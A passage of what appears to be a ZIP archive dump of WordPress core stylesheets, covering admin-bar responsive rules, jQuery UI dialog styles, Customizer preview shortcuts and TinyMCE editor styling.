li#wp-admin-bar-site-name, #wpadminbar li#wp-admin-bar-site-editor, #wpadminbar li#wp-admin-bar-customize, #wpadminbar li#wp-admin-bar-new-content, #wpadminbar li#wp-admin-bar-edit, #wpadminbar li#wp-admin-bar-comments, #wpadminbar li#wp-admin-bar-my-account { display: block; } /* Allow dropdown list items to appear normally */ #wpadminbar li:hover ul li, #wpadminbar li.hover ul li, #wpadminbar li:hover ul li:hover ul li { display: list-item; } /* Override default min-width so dropdown lists aren't stretched to 100% viewport width at responsive sizes. */ #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper { min-width: fit-content; } #wpadminbar ul#wp-admin-bar-root-default > li { margin-right: 0; } /* Experimental fix for touch toolbar dropdown positioning */ #wpadminbar .ab-top-menu, #wpadminbar .ab-top-secondary, #wpadminbar #wp-admin-bar-wp-logo, #wpadminbar #wp-admin-bar-my-sites, #wpadminbar #wp-admin-bar-site-name, #wpadminbar #wp-admin-bar-updates, #wpadminbar #wp-admin-bar-comments, #wpadminbar #wp-admin-bar-new-content, #wpadminbar #wp-admin-bar-edit, #wpadminbar #wp-admin-bar-my-account { position: static; } .network-admin #wpadminbar ul#wp-admin-bar-top-secondary > li#wp-admin-bar-my-account { margin-right: 0; } /* Realign arrows on taller responsive submenus */ #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item:before { top: 10px; left: 0; } } /* Smartphone */ @media screen and (max-width: 600px) { #wpadminbar { position: absolute; } #wp-responsive-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 400; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper { width: 100%; left: 0; } #wpadminbar .menupop .menupop > .ab-item:before { display: none; } #wpadminbar #wp-admin-bar-wp-logo.menupop .ab-sub-wrapper { margin-left: 0; } #wpadminbar .ab-top-menu > .menupop li > .ab-sub-wrapper { margin: 0; width: 100%; top: auto; left: auto; position: relative; } #wpadminbar .ab-top-menu > .menupop li > .ab-sub-wrapper .ab-item { font-size: 16px; padding: 6px 15px 19px 30px; } #wpadminbar li:hover ul li ul li { display: list-item; } #wpadminbar li#wp-admin-bar-wp-logo, #wpadminbar li#wp-admin-bar-updates { display: none; } /* Make submenus full-width at this size */ #wpadminbar .ab-top-menu > .menupop li > .ab-sub-wrapper { position: static; box-shadow: none; } } /* Very narrow screens */ @media screen and (max-width: 400px) { #wpadminbar li#wp-admin-bar-comments { display: none; } } PK!߽jquery-ui-dialog.cssnuȯ/*! * jQuery UI CSS Framework 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/category/theming/ */ /* Layout helpers ----------------------------------*/ .ui-helper-hidden { display: none; } .ui-helper-hidden-accessible { border: 0; clip: rect(0 0 0 0); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; } .ui-helper-reset { margin: 0; padding: 0; border: 0; outline: 0; line-height: 1.3; text-decoration: none; font-size: 100%; list-style: none; } .ui-helper-clearfix:before, .ui-helper-clearfix:after { content: ""; display: table; border-collapse: collapse; } .ui-helper-clearfix:after { clear: both; } .ui-helper-clearfix { min-height: 0; /* support: IE7 */ } .ui-helper-zfix { width: 100%; height: 100%; top: 0; left: 0; position: absolute; opacity: 0; filter:Alpha(Opacity=0); /* support: IE8 */ } .ui-front { z-index: 100; } /* Interaction Cues ----------------------------------*/ .ui-state-disabled { cursor: default !important; } /* Icons ----------------------------------*/ /* states and images */ .ui-icon { display: block; text-indent: -99999px; overflow: hidden; background-repeat: no-repeat; } /* Misc visuals ----------------------------------*/ /* Overlays */ .ui-widget-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; } /*! * jQuery UI Resizable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ .ui-resizable { position: relative; } .ui-resizable-handle { position: absolute; font-size: 0.1px; display: block; touch-action: none; } .ui-resizable-disabled .ui-resizable-handle, .ui-resizable-autohide .ui-resizable-handle { display: none; } .ui-resizable-n { cursor: n-resize; height: 7px; width: 100%; top: -5px; left: 0; } .ui-resizable-s { cursor: s-resize; height: 7px; width: 100%; bottom: -5px; left: 0; } /* rtl:ignore */ .ui-resizable-e { cursor: e-resize; width: 7px; right: -5px; top: 0; height: 100%; } /* rtl:ignore */ .ui-resizable-w { cursor: w-resize; width: 7px; left: -5px; top: 0; height: 100%; } /* rtl:ignore */ .ui-resizable-se { cursor: se-resize; width: 12px; height: 12px; right: 1px; bottom: 1px; } /* rtl:ignore */ .ui-resizable-sw { cursor: sw-resize; width: 9px; height: 9px; left: -5px; bottom: -5px; } /* rtl:ignore */ .ui-resizable-nw { cursor: nw-resize; width: 9px; height: 9px; left: -5px; top: -5px; } /* rtl:ignore */ .ui-resizable-ne { cursor: ne-resize; width: 9px; height: 9px; right: -5px; top: -5px; } /* WP buttons: see buttons.css. */ .ui-button { display: inline-block; text-decoration: none; font-size: 13px; line-height: 2; height: 28px; margin: 0; padding: 0 10px 1px; cursor: pointer; border-width: 1px; border-style: solid; -webkit-appearance: none; border-radius: 3px; white-space: nowrap; box-sizing: border-box; color: #50575e; border-color: #c3c4c7; background: #f6f7f7; box-shadow: 0 1px 0 #c3c4c7; vertical-align: top; } .ui-button:active, .ui-button:focus { outline: none; } /* Remove the dotted border on :focus and the extra padding in Firefox */ .ui-button::-moz-focus-inner { border-width: 0; border-style: none; padding: 0; } .ui-button:hover, .ui-button:focus { background: #f6f7f7; border-color: #8c8f94; color: #1d2327; } .ui-button:focus { border-color: #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); } .ui-button:active { background: #f0f0f1; border-color: #8c8f94; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); } .ui-button[disabled], .ui-button:disabled { color: #a7aaad !important; border-color: #dcdcde !important; background: #f6f7f7 !important; box-shadow: none !important; text-shadow: 0 1px 0 #fff !important; cursor: default; transform: none !important; } @media screen and (max-width: 782px) { .ui-button { padding: 6px 14px; line-height: normal; font-size: 14px; vertical-align: middle; height: auto; margin-bottom: 4px; } } /* WP Theme */ .ui-dialog { position: absolute; top: 0; left: 0; z-index: 100102; background-color: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); overflow: hidden; } .ui-dialog-titlebar { background: #fff; border-bottom: 1px solid #dcdcde; height: 36px; font-size: 18px; font-weight: 600; line-height: 2; padding: 0 36px 0 16px; } .ui-button.ui-dialog-titlebar-close { background: none; border: none; box-shadow: none; color: #646970; cursor: pointer; display: block; padding: 0; position: absolute; top: 0; right: 0; width: 36px; height: 36px; text-align: center; border-radius: 0; overflow: hidden; } .ui-dialog-titlebar-close:before { font: normal 20px/1 dashicons; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; line-height: 1.8; width: 36px; height: 36px; content: "\f158"; content: "\f158" / ''; } .ui-button.ui-dialog-titlebar-close:hover, .ui-button.ui-dialog-titlebar-close:focus { color: #135e96; } .ui-button.ui-dialog-titlebar-close:focus { box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .ui-dialog-content { padding: 16px; overflow: auto; } .ui-dialog-buttonpane { background: #fff; border-top: 1px solid #dcdcde; padding: 16px; } .ui-dialog-buttonpane .ui-button { margin-left: 16px; } .ui-dialog-buttonpane .ui-dialog-buttonset { float: right; } .ui-draggable .ui-dialog-titlebar { cursor: move; } .ui-widget-overlay { position: fixed; top: 0; left: 0; right: 0; bottom: 0; min-height: 360px; background: #000; opacity: 0.7; filter: alpha(opacity=70); z-index: 100101; } PK!rjquery-ui-dialog-rtl.min.cssnuȯ/*! This file is auto-generated */ /*! * jQuery UI CSS Framework 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/category/theming/ */.ui-helper-hidden{display:none}.ui-helper-hidden-accessible{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none}.ui-helper-clearfix:after,.ui-helper-clearfix:before{content:"";display:table;border-collapse:collapse}.ui-helper-clearfix:after{clear:both}.ui-helper-clearfix{min-height:0}.ui-helper-zfix{width:100%;height:100%;top:0;right:0;position:absolute;opacity:0;filter:Alpha(Opacity=0)}.ui-front{z-index:100}.ui-state-disabled{cursor:default!important}.ui-icon{display:block;text-indent:-99999px;overflow:hidden;background-repeat:no-repeat}.ui-widget-overlay{position:fixed;top:0;right:0;width:100%;height:100%}/*! * jQuery UI Resizable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */.ui-resizable{position:relative}.ui-resizable-handle{position:absolute;font-size:.1px;display:block;touch-action:none}.ui-resizable-autohide .ui-resizable-handle,.ui-resizable-disabled .ui-resizable-handle{display:none}.ui-resizable-n{cursor:n-resize;height:7px;width:100%;top:-5px;right:0}.ui-resizable-s{cursor:s-resize;height:7px;width:100%;bottom:-5px;right:0}.ui-resizable-e{cursor:e-resize;width:7px;right:-5px;top:0;height:100%}.ui-resizable-w{cursor:w-resize;width:7px;left:-5px;top:0;height:100%}.ui-resizable-se{cursor:se-resize;width:12px;height:12px;right:1px;bottom:1px}.ui-resizable-sw{cursor:sw-resize;width:9px;height:9px;left:-5px;bottom:-5px}.ui-resizable-nw{cursor:nw-resize;width:9px;height:9px;left:-5px;top:-5px}.ui-resizable-ne{cursor:ne-resize;width:9px;height:9px;right:-5px;top:-5px}.ui-button{display:inline-block;text-decoration:none;font-size:13px;line-height:2;height:28px;margin:0;padding:0 10px 1px;cursor:pointer;border-width:1px;border-style:solid;-webkit-appearance:none;border-radius:3px;white-space:nowrap;box-sizing:border-box;color:#50575e;border-color:#c3c4c7;background:#f6f7f7;box-shadow:0 1px 0 #c3c4c7;vertical-align:top}.ui-button:active,.ui-button:focus{outline:0}.ui-button::-moz-focus-inner{border-width:0;border-style:none;padding:0}.ui-button:focus,.ui-button:hover{background:#f6f7f7;border-color:#8c8f94;color:#1d2327}.ui-button:focus{border-color:#4f94d4;box-shadow:0 0 3px rgba(34,113,177,.8)}.ui-button:active{background:#f0f0f1;border-color:#8c8f94;box-shadow:inset 0 2px 5px -3px rgba(0,0,0,.5)}.ui-button:disabled,.ui-button[disabled]{color:#a7aaad!important;border-color:#dcdcde!important;background:#f6f7f7!important;box-shadow:none!important;text-shadow:0 1px 0 #fff!important;cursor:default;transform:none!important}@media screen and (max-width:782px){.ui-button{padding:6px 14px;line-height:normal;font-size:14px;vertical-align:middle;height:auto;margin-bottom:4px}}.ui-dialog{position:absolute;top:0;right:0;z-index:100102;background-color:#fff;box-shadow:0 3px 6px rgba(0,0,0,.3);overflow:hidden}.ui-dialog-titlebar{background:#fff;border-bottom:1px solid #dcdcde;height:36px;font-size:18px;font-weight:600;line-height:2;padding:0 16px 0 36px}.ui-button.ui-dialog-titlebar-close{background:0 0;border:none;box-shadow:none;color:#646970;cursor:pointer;display:block;padding:0;position:absolute;top:0;left:0;width:36px;height:36px;text-align:center;border-radius:0;overflow:hidden}.ui-dialog-titlebar-close:before{font:normal 20px/1 dashicons;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;line-height:1.8;width:36px;height:36px;content:"\f158";content:"\f158"/''}.ui-button.ui-dialog-titlebar-close:focus,.ui-button.ui-dialog-titlebar-close:hover{color:#135e96}.ui-button.ui-dialog-titlebar-close:focus{box-shadow:0 0 0 2px #2271b1;outline:2px solid transparent;outline-offset:-2px}.ui-dialog-content{padding:16px;overflow:auto}.ui-dialog-buttonpane{background:#fff;border-top:1px solid #dcdcde;padding:16px}.ui-dialog-buttonpane .ui-button{margin-right:16px}.ui-dialog-buttonpane .ui-dialog-buttonset{float:left}.ui-draggable .ui-dialog-titlebar{cursor:move}.ui-widget-overlay{position:fixed;top:0;right:0;left:0;bottom:0;min-height:360px;background:#000;opacity:.7;z-index:100101}PK!--customize-preview.cssnu&1i.customize-partial-refreshing { opacity: 0.25; transition: opacity 0.25s; cursor: progress; } /* Override highlight when refreshing */ .customize-partial-refreshing.widget-customizer-highlighted-widget { box-shadow: none; } /* Make shortcut buttons essentially invisible */ .widget .customize-partial-edit-shortcut, .customize-partial-edit-shortcut { position: absolute; float: left; width: 1px; /* required to have a size to be focusable in Safari */ height: 1px; padding: 0; margin: -1px 0 0 -1px; border: 0; background: transparent; color: transparent; box-shadow: none; outline: none; z-index: 5; } /** * Styles for the actual shortcut * * Note that some properties are overly verbose to prevent theme interference. */ .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { position: absolute; left: -30px; top: 2px; color: #fff; width: 30px; height: 30px; min-width: 30px; min-height: 30px; line-height: 1 !important; font-size: 18px; z-index: 5; background: #3582c4 !important; border-radius: 50%; border: 2px solid #fff; box-shadow: 0 2px 1px rgba(60, 67, 74, 0.15); text-align: center; cursor: pointer; box-sizing: border-box; padding: 3px; animation-fill-mode: both; animation-duration: .4s; opacity: 0; pointer-events: none; text-shadow: 0 -1px 1px #135e96, 1px 0 1px #135e96, 0 1px 1px #135e96, -1px 0 1px #135e96; } .wp-custom-header .customize-partial-edit-shortcut button { left: 2px } .customize-partial-edit-shortcut button svg { fill: #fff; min-width: 20px; min-height: 20px; width: 20px; height: 20px; margin: auto; } .customize-partial-edit-shortcut button:hover { background: #4f94d4 !important; /* matches primary buttons */ } .customize-partial-edit-shortcut button:focus { box-shadow: 0 0 0 2px #4f94d4; } body.customize-partial-edit-shortcuts-shown .customize-partial-edit-shortcut button { animation-name: customize-partial-edit-shortcut-bounce-appear; pointer-events: auto; } body.customize-partial-edit-shortcuts-hidden .customize-partial-edit-shortcut button { animation-name: customize-partial-edit-shortcut-bounce-disappear; pointer-events: none; } .page-sidebar-collapsed .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut-hidden .customize-partial-edit-shortcut button { visibility: hidden; } @keyframes customize-partial-edit-shortcut-bounce-appear { from, 20%, 40%, 60%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); } 0% { opacity: 0; transform: scale3d(.3, .3, .3); } 20% { transform: scale3d(1.1, 1.1, 1.1); } 40% { transform: scale3d(.9, .9, .9); } 60% { opacity: 1; transform: scale3d(1.03, 1.03, 1.03); } 80% { transform: scale3d(.97, .97, .97); } to { opacity: 1; transform: scale3d(1, 1, 1); } } @keyframes customize-partial-edit-shortcut-bounce-disappear { from, 20%, 40%, 60%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); } 0% { opacity: 1; transform: scale3d(1, 1, 1); } 20% { transform: scale3d(.97, .97, .97); } 40% { opacity: 1; transform: scale3d(1.03, 1.03, 1.03); } 60% { transform: scale3d(.9, .9, .9); } 80% { transform: scale3d(1.1, 1.1, 1.1); } to { opacity: 0; transform: scale3d(.3, .3, .3); } } @media screen and (max-width: 800px) { .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { left: -32px; } } @media screen and (max-width: 320px) { .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { left: -30px; } } PK!gce}}editor-rtl.cssnuȯ/*! This file is auto-generated */ /*------------------------------------------------------------------------------ TinyMCE and Quicklinks toolbars ------------------------------------------------------------------------------*/ /* TinyMCE widgets/containers */ .mce-tinymce { box-shadow: none; } .mce-container, .mce-container *, .mce-widget, .mce-widget * { color: inherit; font-family: inherit; } .mce-container .mce-monospace, .mce-widget .mce-monospace { font-family: Consolas, Monaco, monospace; font-size: 13px; line-height: 150%; } /* TinyMCE windows */ #mce-modal-block, #mce-modal-block.mce-fade { opacity: 0.7; filter: alpha(opacity=70); transition: none; background: #000; } .mce-window { border-radius: 0; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); -webkit-font-smoothing: subpixel-antialiased; transition: none; } .mce-window .mce-container-body.mce-abs-layout { overflow: visible; } .mce-window .mce-window-head { background: #fff; border-bottom: 1px solid #dcdcde; padding: 0; min-height: 36px; } .mce-window .mce-window-head .mce-title { color: #3c434a; font-size: 18px; font-weight: 600; line-height: 36px; margin: 0; padding: 0 16px 0 36px; } .mce-window .mce-window-head .mce-close, .mce-window-head .mce-close .mce-i-remove { color: transparent; top: 0; left: 0; width: 36px; height: 36px; padding: 0; line-height: 36px; text-align: center; } .mce-window-head .mce-close .mce-i-remove:before { font: normal 20px/36px dashicons; text-align: center; color: #646970; width: 36px; height: 36px; display: block; } .mce-window-head .mce-close:hover .mce-i-remove:before, .mce-window-head .mce-close:focus .mce-i-remove:before { color: #135e96; } .mce-window-head .mce-close:focus .mce-i-remove, div.mce-tab:focus { box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .mce-window .mce-window-head .mce-dragh { width: calc( 100% - 36px ); } .mce-window .mce-foot { border-top: 1px solid #dcdcde; } .mce-textbox, .mce-checkbox i.mce-i-checkbox, #wp-link .query-results { border: 1px solid #dcdcde; border-radius: 0; box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.07); transition: .05s all ease-in-out; } .mce-textbox:focus, .mce-textbox.mce-focus, .mce-checkbox:focus i.mce-i-checkbox, #wp-link .query-results:focus { border-color: #4f94d4; box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .mce-window .mce-wp-help { height: 360px; width: 460px; overflow: auto; } .mce-window .mce-wp-help * { box-sizing: border-box; } .mce-window .mce-wp-help > .mce-container-body { width: auto !important; } .mce-window .wp-editor-help { padding: 10px 20px 0 10px; } .mce-window .wp-editor-help h2, .mce-window .wp-editor-help p { margin: 8px 0; white-space: normal; font-size: 14px; font-weight: 400; } .mce-window .wp-editor-help table { width: 100%; margin-bottom: 20px; } .mce-window .wp-editor-help table.wp-help-single { margin: 0 8px 20px; } .mce-window .wp-editor-help table.fixed { table-layout: fixed; } .mce-window .wp-editor-help table.fixed th:nth-child(odd), .mce-window .wp-editor-help table.fixed td:nth-child(odd) { width: 12%; } .mce-window .wp-editor-help table.fixed th:nth-child(even), .mce-window .wp-editor-help table.fixed td:nth-child(even) { width: 38%; } .mce-window .wp-editor-help table.fixed th:nth-child(odd) { padding: 5px 0 0; } .mce-window .wp-editor-help td, .mce-window .wp-editor-help th { font-size: 13px; padding: 5px; vertical-align: middle; word-wrap: break-word; white-space: normal; } .mce-window .wp-editor-help th { font-weight: 600; padding-bottom: 0; } .mce-window .wp-editor-help kbd { font-family: monospace; padding: 2px 7px 3px; font-weight: 600; margin: 0; background: #f0f0f1; background: rgba(0, 0, 0, 0.08); } .mce-window .wp-help-th-center td:nth-child(odd), .mce-window .wp-help-th-center th:nth-child(odd) { text-align: center; } /* TinyMCE menus */ .mce-menu, .mce-floatpanel.mce-popover { border-color: rgba(0, 0, 0, 0.15); border-radius: 0; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); } .mce-menu, .mce-floatpanel.mce-popover.mce-bottom { margin-top: 2px; } .mce-floatpanel .mce-arrow { display: none; } .mce-menu .mce-container-body { min-width: 160px; } .mce-menu-item { border: none; margin-bottom: 2px; padding: 6px 12px 6px 15px; } .mce-menu-has-icons i.mce-ico { line-height: 20px; } /* TinyMCE panel */ div.mce-panel { border: 0; background: #fff; } .mce-panel.mce-menu { border: 1px solid #dcdcde; } div.mce-tab { line-height: 13px; } /* TinyMCE toolbars */ div.mce-toolbar-grp { border-bottom: 1px solid #dcdcde; background: #f6f7f7; padding: 0; position: relative; } div.mce-inline-toolbar-grp { border: 1px solid #a7aaad; border-radius: 2px; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.15); box-sizing: border-box; margin-bottom: 8px; position: absolute; -webkit-user-select: none; user-select: none; max-width: 98%; z-index: 100100; /* Same as the other TinyMCE "panels" */ } div.mce-inline-toolbar-grp > div.mce-stack-layout { padding: 1px; } div.mce-inline-toolbar-grp.mce-arrow-up { margin-bottom: 0; margin-top: 8px; } div.mce-inline-toolbar-grp:before, div.mce-inline-toolbar-grp:after { position: absolute; right: 50%; display: block; width: 0; height: 0; border-style: solid; border-color: transparent; content: ""; } div.mce-inline-toolbar-grp.mce-arrow-up:before { top: -9px; border-bottom-color: #a7aaad; border-width: 0 9px 9px; margin-right: -9px; } div.mce-inline-toolbar-grp.mce-arrow-down:before { bottom: -9px; border-top-color: #a7aaad; border-width: 9px 9px 0; margin-right: -9px; } div.mce-inline-toolbar-grp.mce-arrow-up:after { top: -8px; border-bottom-color: #f6f7f7; border-width: 0 8px 8px; margin-right: -8px; } div.mce-inline-toolbar-grp.mce-arrow-down:after { bottom: -8px; border-top-color: #f6f7f7; border-width: 8px 8px 0; margin-right: -8px; } div.mce-inline-toolbar-grp.mce-arrow-left:before, div.mce-inline-toolbar-grp.mce-arrow-left:after { margin: 0; } div.mce-inline-toolbar-grp.mce-arrow-left:before { right: 20px; } div.mce-inline-toolbar-grp.mce-arrow-left:after { right: 21px; } div.mce-inline-toolbar-grp.mce-arrow-right:before, div.mce-inline-toolbar-grp.mce-arrow-right:after { right: auto; margin: 0; } div.mce-inline-toolbar-grp.mce-arrow-right:before { left: 20px; } div.mce-inline-toolbar-grp.mce-arrow-right:after { left: 21px; } div.mce-inline-toolbar-grp.mce-arrow-full { left: 0; } div.mce-inline-toolbar-grp.mce-arrow-full > div { width: 100%; overflow-x: auto; } div.mce-toolbar-grp > div { padding: 3px; } .has-dfw div.mce-toolbar-grp .mce-toolbar.mce-first { padding-left: 32px; } .mce-toolbar .mce-btn-group { margin: 0; } /* Classic block hide/show toolbars */ .block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child) { display: none; } .block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar { display: block; } div.mce-statusbar { border-top: 1px solid #dcdcde; } div.mce-path { padding: 2px 10px; margin: 0; } .mce-path, .mce-path-item, .mce-path .mce-divider { font-size: 12px; } .mce-toolbar .mce-btn, .qt-dfw { border-color: transparent; background: transparent; box-shadow: none; text-shadow: none; cursor: pointer; } .mce-btn .mce-txt { direction: inherit; text-align: inherit; } .mce-toolbar .mce-btn-group .mce-btn, .qt-dfw { border: 1px solid transparent; margin: 2px; border-radius: 2px; } .mce-toolbar .mce-btn-group .mce-btn:hover, .mce-toolbar .mce-btn-group .mce-btn:focus, .qt-dfw:hover, .qt-dfw:focus { background: #f6f7f7; color: #1d2327; box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .mce-toolbar .mce-btn-group .mce-btn.mce-active, .mce-toolbar .mce-btn-group .mce-btn:active, .qt-dfw.active { background: #f0f0f1; border-color: #50575e; } .mce-btn.mce-active, .mce-btn.mce-active button, .mce-btn.mce-active:hover button, .mce-btn.mce-active i, .mce-btn.mce-active:hover i { color: inherit; } .mce-toolbar .mce-btn-group .mce-btn.mce-active:hover, .mce-toolbar .mce-btn-group .mce-btn.mce-active:focus { border-color: #1d2327; } .mce-toolbar .mce-btn-group .mce-btn.mce-disabled:hover, .mce-toolbar .mce-btn-group .mce-btn.mce-disabled:focus { color: #a7aaad; background: none; border-color: #dcdcde; text-shadow: 0 1px 0 #fff; box-shadow: none; } .mce-toolbar .mce-btn-group .mce-btn.mce-disabled:focus { border-color: #50575e; } .mce-toolbar .mce-btn-group .mce-first, .mce-toolbar .mce-btn-group .mce-last { border-color: transparent; } .mce-toolbar .mce-btn button, .qt-dfw { padding: 2px 3px; line-height: normal; } .mce-toolbar .mce-listbox button { font-size: 13px; line-height: 1.53846153; padding-right: 6px; padding-left: 20px; } .mce-toolbar .mce-btn i { text-shadow: none; } .mce-toolbar .mce-btn-group > div { white-space: normal; } .mce-toolbar .mce-colorbutton .mce-open { border-left: 0; } .mce-toolbar .mce-colorbutton .mce-preview { margin: 0; padding: 0; top: auto; bottom: 2px; right: 3px; height: 3px; width: 20px; background: #50575e; } .mce-toolbar .mce-btn-group .mce-btn.mce-primary { min-width: 0; background: #3582c4; border-color: #2271b1 #135e96 #135e96; box-shadow: 0 1px 0 #135e96; color: #fff; text-decoration: none; text-shadow: none; } /* Compensate for the extra box shadow at the bottom of .mce-btn.mce-primary */ .mce-toolbar .mce-btn-group .mce-btn.mce-primary button { padding: 2px 3px 1px; } .mce-toolbar .mce-btn-group .mce-btn.mce-primary .mce-ico { color: #fff; } .mce-toolbar .mce-btn-group .mce-btn.mce-primary:hover, .mce-toolbar .mce-btn-group .mce-btn.mce-primary:focus { background: #4f94d4; border-color: #135e96; color: #fff; } .mce-toolbar .mce-btn-group .mce-btn.mce-primary:focus { box-shadow: 0 0 1px 1px #72aee6; } .mce-toolbar .mce-btn-group .mce-btn.mce-primary:active { background: #2271b1; border-color: #135e96; box-shadow: inset 0 2px 0 #135e96; } /* mce listbox */ .mce-toolbar .mce-btn-group .mce-btn.mce-listbox { border-radius: 0; direction: rtl; background: #fff; border: 1px solid #dcdcde; } .mce-toolbar .mce-btn-group .mce-btn.mce-listbox:hover, .mce-toolbar .mce-btn-group .mce-btn.mce-listbox:focus { box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .mce-panel .mce-btn i.mce-caret { border-top: 6px solid #50575e; margin-right: 2px; margin-left: 2px; } .mce-listbox i.mce-caret { left: 4px; } .mce-panel .mce-btn:hover i.mce-caret, .mce-panel .mce-btn:focus i.mce-caret { border-top-color: #1d2327; } .mce-panel .mce-active i.mce-caret { border-top: 0; border-bottom: 6px solid #1d2327; margin-top: 7px; } .mce-listbox.mce-active i.mce-caret { margin-top: -3px; } .mce-toolbar .mce-splitbtn:hover .mce-open { border-left-color: transparent; } .mce-toolbar .mce-splitbtn .mce-open.mce-active { background: transparent; outline: none; } .mce-menu .mce-menu-item:hover, .mce-menu .mce-menu-item.mce-selected, .mce-menu .mce-menu-item:focus, .mce-menu .mce-menu-item.mce-active.mce-menu-item-normal, .mce-menu .mce-menu-item.mce-active.mce-menu-item-preview { background: #2271b1; /* See color scheme. */ color: #fff; } .mce-menu .mce-menu-item:hover .mce-caret, .mce-menu .mce-menu-item:focus .mce-caret, .mce-menu .mce-menu-item.mce-selected .mce-caret { border-right-color: #fff; } /* rtl:ignore */ .rtl .mce-menu .mce-menu-item:hover .mce-caret, .rtl .mce-menu .mce-menu-item:focus .mce-caret, .rtl .mce-menu .mce-menu-item.mce-selected .mce-caret { border-left-color: inherit; border-right-color: #fff; } .mce-menu .mce-menu-item:hover .mce-text, .mce-menu .mce-menu-item:focus .mce-text, .mce-menu .mce-menu-item:hover .mce-ico, .mce-menu .mce-menu-item:focus .mce-ico, .mce-menu .mce-menu-item.mce-selected .mce-text, .mce-menu .mce-menu-item.mce-selected .mce-ico, .mce-menu .mce-menu-item:hover .mce-menu-shortcut, .mce-menu .mce-menu-item:focus .mce-menu-shortcut, .mce-menu .mce-menu-item.mce-active .mce-menu-shortcut, .mce-menu .mce-menu-item.mce-disabled:hover .mce-text, .mce-menu .mce-menu-item.mce-disabled:hover .mce-ico { color: inherit; } .mce-menu .mce-menu-item.mce-disabled { cursor: default; } .mce-menu .mce-menu-item.mce-disabled:hover { background: #c3c4c7; } /* Menubar */ div.mce-menubar { border-color: #dcdcde; background: #fff; border-width: 0 0 1px; } .mce-menubar .mce-menubtn:hover, .mce-menubar .mce-menubtn.mce-active, .mce-menubar .mce-menubtn:focus { border-color: transparent; background: transparent; } .mce-menubar .mce-menubtn:focus { color: #043959; box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } div.mce-menu .mce-menu-item-sep, .mce-menu-item-sep:hover { border-bottom: 1px solid #dcdcde; height: 0; margin: 5px 0; } .mce-menubtn span { margin-left: 0; padding-right: 3px; } .mce-menu-has-icons i.mce-ico:before { margin-right: -2px; } /* Keyboard shortcuts position */ .mce-menu.mce-menu-align .mce-menu-item-normal { position: relative; } .mce-menu.mce-menu-align .mce-menu-shortcut { bottom: 0.6em; font-size: 0.9em; } /* Buttons in modals */ .mce-primary button, .mce-primary button i { text-align: center; color: #fff; text-shadow: none; padding: 0; line-height: 1.85714285; } .mce-window .mce-btn { color: #50575e; background: #f6f7f7; text-decoration: none; font-size: 13px; line-height: 26px; height: 28px; margin: 0; padding: 0; cursor: pointer; border: 1px solid #c3c4c7; -webkit-appearance: none; border-radius: 3px; white-space: nowrap; box-shadow: 0 1px 0 #c3c4c7; } /* Remove the dotted border on :focus and the extra padding in Firefox */ .mce-window .mce-btn::-moz-focus-inner { border-width: 0; border-style: none; padding: 0; } .mce-window .mce-btn:hover, .mce-window .mce-btn:focus { background: #f6f7f7; border-color: #8c8f94; color: #1d2327; } .mce-window .mce-btn:focus { border-color: #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); } .mce-window .mce-btn:active { background: #f0f0f1; border-color: #8c8f94; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); transform: translateY(1px); } .mce-window .mce-btn.mce-disabled { color: #a7aaad !important; border-color: #dcdcde !important; background: #f6f7f7 !important; box-shadow: none !important; text-shadow: 0 1px 0 #fff !important; cursor: default; transform: none !important; } .mce-window .mce-btn.mce-primary { background: #3582c4; border-color: #2271b1 #135e96 #135e96; box-shadow: 0 1px 0 #135e96; color: #fff; text-decoration: none; text-shadow: 0 -1px 1px #135e96, -1px 0 1px #135e96, 0 1px 1px #135e96, 1px 0 1px #135e96; } .mce-window .mce-btn.mce-primary:hover, .mce-window .mce-btn.mce-primary:focus { background: #4f94d4; border-color: #135e96; color: #fff; } .mce-window .mce-btn.mce-primary:focus { 